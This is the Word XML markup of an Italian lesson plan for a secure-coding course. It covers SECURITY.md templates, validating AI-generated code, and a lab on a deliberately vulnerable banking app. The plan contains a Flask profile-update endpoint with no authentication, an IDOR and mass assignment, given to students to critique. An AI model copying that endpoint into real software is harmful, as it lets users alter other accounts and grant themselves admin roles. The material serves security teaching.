    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="obiettivi-formativi-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">strutturare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un documento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per un progetto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compila almeno una sezione del template per il proprio progetto UF 10/11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conosce i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7 errori tipici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del codice generato da AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa applicare il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">workflow di validazione in 4 step</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ai suggerimenti AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa quando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usare l’AI</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="articolazione-minuto-per-minuto-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10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Perché documentare la sicurezza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: requisito GDPR Art. 32, NIS 2, CRA. Collegamento UF 7 (documentazione tecnica)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:25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Tour del Template</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 9 sezioni di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SECURITY.md</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Distribuzione di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">02_template_documentazione_sicurezza.docx</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e dell’esempio compilato MiniBlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:25 – 0:55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Lab a coppie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: ogni coppia inizia a compilare il template per il</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">proprio progetto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(quello che porteranno avanti in UF 10/11/12/13 → stage). Compilare almeno: Sezione 1, Sezione 2 (DFD + 5 minacce), Sezione 3.1-3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab a coppie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:55 – 1:10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PAUSA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1:10 – 1:25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Uso dell’AI nello sviluppo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Copilot, Claude, ChatGPT. Perché serve validare. I 7 errori tipici (con esempi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:25 – 1:45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Workflow validazione in 4 step</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: lettura, scan pattern, contesto, test. Esempio guidato: prendi un suggerimento ChatGPT pre-preparato (vulnerabile) e applica la checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + demo live</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:45 – 1:55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Casi pratici</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 4 esempi di codice AI vulnerabile (login con SHA-256, IDOR, run_cmd, upload). Discussione</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“cosa correggeresti?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Discussione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:55 – 2:00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Aspetti etici</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: mai segreti nei prompt, IP, policy aziendale, GDPR. EU AI Act in 2 minuti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="X4a56145e1628acb3e827ea1e02372a1294002bf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esercizio in classe — validazione codice AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distribuisci agli studenti questo snippet generato da ChatGPT (lavagna o slide):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route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"/api/profile/&lt;int:user_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"PUT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t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update_profile(user_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    data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request.json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    user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User.query.get(user_id)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key, value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data.items():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setattr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user, key, value)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    db.session.commit()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jsonify(user.to_dict())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chiedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Quante vulnerabilità trovate?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discussione collettiva (5 min):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. ✅ No auth richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. ✅ IDOR (cambio user_id)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. ✅ Mass Assignment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role: admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. ✅ Nessuna validation input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. ✅ Espone tutti i campi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">to_dict()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="materiali-per-il-docente-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">02_template_documentazione_sicurezza.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(stampato)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">02_template_documentazione_sicurezza_ESEMPIO_COMPILATO.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(stampato come riferimento)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">03_guida_validazione_codice_IA.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(distribuito digitalmente)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Snippet AI vulnerabili pre-preparati su slide</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="verifica-in-itinere-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fine lezione, ogni coppia consegna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">una pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del proprio template compilata (sezione 1 + 2). Vale come parte della valutazione finale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="compito-per-l8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Completare il template SECURITY.md fino alla sezione 3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ripasso integrale della Checklist Secure Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone https://github.com/ss4i/corso-its-cybersecurity-32h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cd 02_lab/M6_sqli_step_by_step</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per familiarizzare con la struttura)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="errori-da-evitare-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Trattare la documentazione come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“compito noioso da fare alla fine”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: va integrata nello sviluppo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Demonizzare l’AI: i discenti la useranno comunque. Insegna a usarla bene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Saltare l’esempio pratico di validazione codice AI: è il momento più memorabile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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L8 — Lab integrato + Verifica (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="obiettivi-formativi-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">trasversalmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tutto ciò che ha imparato nel modulo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifica almeno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un’app reale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Produce un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mini-report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scritto con PoC e fix proposto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È valutato sul lab pratico</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="74" w:name="articolazione-minuto-per-minuto-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10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Briefing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: scenario</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“Sei un junior security analyst. BancaPiccola ti chiede una review prima del lancio. Trova le vuln, scrivi un mini-report.”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Regole + tempistica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 1:30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Lavoro individuale o a coppie (80 min)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: review di un’app vulnerabile pre-preparata dal docente (può essere</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bancapiccola-mini</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">finale + 3-5 vuln aggiuntive). Output: file</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">report.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab attivo individuale/coppie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:30 – 1:50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Discussione collettiva</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: ognuno presenta in 2 min la propria vulnerabilità</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“preferita”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Discussione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:50 – 2:00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Chiusura modulo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: riassunto, takeaway, distribuzione finale Checklist + cartaceo dei 3 documenti + link al repo per autostudio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="setup-app-per-la-verifica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup app per la verifica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il docente prepara una versione dell’app vulnerabile (può clonare il repo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">M6_sqli_step_by_step</w:t>
      </w:r>
